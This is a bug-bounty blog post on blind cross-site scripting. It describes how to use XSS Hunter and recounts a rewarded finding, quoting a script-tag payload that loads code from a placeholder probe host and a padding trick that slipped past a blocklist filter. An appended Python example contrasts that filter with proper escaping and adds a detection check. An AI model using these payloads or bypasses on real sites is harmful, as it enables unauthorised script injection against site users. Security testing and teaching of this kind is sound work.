First of all, this blog is just for educational purposes. I will not be responsible if you mess anything up.
Blind XSS is a variant of stored cross-site scripting: the input provided by the attacker is saved by the web server, and that stored input is later rendered in another part of the same application or in a different application that shares the data. The payload only triggers when the stored input is executed as a script in that other context, which the attacker cannot see.
The attacker injects the malicious script or payload ‘blindly’ into web pages without any assurance that it will ever execute. Web pages that are likely to save their input into a database are the most important carriers for Blind XSS attacks.
There are some tools available on the Internet to find blind XSS:
1. XSS Hunter
2. Burp Collaborator
3. KNOXSS
Now I’m going to explain the easiest way to find Blind XSS.
Let’s start.
In my opinion, XSS Hunter is the easiest way to find blind XSS.
XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page back to the XSS Hunter service.
The best part of XSS Hunter is that whenever your script fires you get a dedicated email from XSS Hunter telling you which endpoint the payload fired on.
Let’s go step by step:
1. Navigate to https://xsshunter.com/app
2. Create your account
3. After creation, go to Payloads
4. Choose any payload and go to your target
5. Use your payload in any field that you think may be vulnerable to Blind XSS
6. Whenever your payload fires you will get an email
Now you know how XSS Hunter works, and next I’m going to explain how I found blind XSS on a target.
Once upon a time I was trying to find bugs on a private program on HackerOne. I tried many ways but had no luck.
I was trying on the discussion forum but still no luck.
Then I used one payload from XSS Hunter.
I used this payload: "><script src=//yoursubdomain.xss.ht></script>
But still the same result.
Then I just stopped testing for the day.
The next day I tried again with the same payload.
I copied the payload from XSS Hunter,
created a new discussion on my target,
and used that payload.
When I pasted my payload I decided to check the page source.
Finally I found where the problem lay:
there was blocking for that type of payload.
New payload: ---"><script src=//yoursubdomain.xss.ht></script>---
I only added these --- at both ends.
I copied that payload and pasted it in the discussion.
BOOM, it worked!
I got many mails from XSS Hunter.
Now for the best part: I ethically reported this bug and got rewarded.
Yahoooooooo, I got $300 🥳🥳🥳🥳🥳🥳🥳🥳
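The filter the author ran into rejected the plain probe but let the padded one through, which is the usual failure of blocklist-style input filtering. The Python below is an added example, not code from the original post or from the target: it models that weakness with a hypothetical blocklist anchored at the start of the input (an assumption about the kind of check involved, not the target's real code) next to the fix that actually holds up, escaping stored text for its HTML context at render time, plus a check a defender can run over stored comments to flag any that would still render a live script tag.

```python
import html
import re

# Constructed sample inputs: the probe from the write-up and the padded
# variant. The host is the write-up's placeholder, not a real probe domain.
PROBE = '"><script src=//yoursubdomain.xss.ht></script>'
PADDED_PROBE = '---' + PROBE + '---'
BENIGN = 'Thanks, that fixed my login issue.'

# Hypothetical blocklist (assumption, not the target's actual filter): it only
# rejects input that *starts* with the classic attribute-breakout sequence,
# so any leading padding defeats it.
_BLOCK_RE = re.compile(r'^"><script', re.IGNORECASE)


def naive_filter_allows(text: str) -> bool:
    """Return True if the blocklist lets the text through unchanged."""
    return _BLOCK_RE.search(text) is None


def render_naive(comment: str) -> str:
    """Before: rely on the blocklist, then splice raw text into the markup."""
    if not naive_filter_allows(comment):
        raise ValueError("rejected by blocklist")
    return f'<div class="comment" data-preview="{comment}">{comment}</div>'


def render_hardened(comment: str) -> str:
    """After: no blocklist; escape for the HTML attribute and body context."""
    safe = html.escape(comment, quote=True)
    return f'<div class="comment" data-preview="{safe}">{safe}</div>'


def contains_live_script(markup: str) -> bool:
    """Defender's check: would this rendered markup still load a script tag?"""
    return '<script' in markup.lower()


if __name__ == '__main__':
    for name, text in (('probe', PROBE), ('padded', PADDED_PROBE)):
        allowed = naive_filter_allows(text)
        print(f'{name}: blocklist allows={allowed}')
        if allowed:
            print('  naive render live script:',
                  contains_live_script(render_naive(text)))
        print('  hardened render live script:',
              contains_live_script(render_hardened(text)))
```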